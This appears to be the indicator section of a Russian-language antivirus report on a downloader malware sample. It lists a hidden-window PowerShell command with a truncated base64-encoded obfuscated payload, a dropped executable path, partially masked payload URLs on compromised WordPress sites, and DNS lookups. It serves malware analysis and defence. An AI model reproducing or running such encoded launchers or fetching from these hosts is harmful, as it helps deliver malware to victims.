Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAHEAYQBqAG0AcAB5AD0AKAAoACcAVgAnACsAJwBiAHkAdgAnACkAKwAnAHgAJwArACcAagB6ACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAVQBTAGUAcgBQAHIAbwBmAEkATABlAFwAZABJAG...
- %HOMEPATH%\diar8h7\off1fey\j_eilb.exe
- %HOMEPATH%\diar8h7\off1fey\j_eilb.exe
- http://cr#.#ectigo.com/SectigoRSADomainValidationSecureServerCA.crt
- http://ma####awildlife.com/wp-admin/zuWZW/
- http://se###mdesa.org/wp-admin/aC4/
- http://bl##.#unapro.com/wp-admin/js/widgets/EH4agl/
- DNS ASK te####tejson.com
- DNS ASK ho#####.mybestheme.com
- DNS ASK ta####2plate.com
- DNS ASK cr#.#ectigo.com
- DNS ASK ma####awildlife.com
- DNS ASK se###mdesa.org
- DNS ASK ib####dwebsites.com
- DNS ASK bl##.#unapro.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAHEAYQBqAG0AcAB5AD0AKAAoACcAVgAnACsAJwBiAHkAdgAnACkAKwAnAHgAJwArACcAagB6ACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAVQBTAGUAcgBQAHIAbwBmAEkATABlAFwAZABJAG...' (со скрытым окном)